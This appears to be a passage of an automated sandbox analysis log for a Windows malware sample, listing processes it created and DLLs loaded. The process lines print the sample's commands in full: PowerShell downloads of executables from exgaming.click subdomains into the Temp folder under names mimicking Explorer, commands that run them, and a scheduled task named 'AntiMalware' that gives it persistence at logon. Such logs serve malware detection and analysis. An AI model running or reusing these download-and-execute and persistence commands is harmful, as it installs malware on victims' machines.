                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Section loaded: profapi.dll
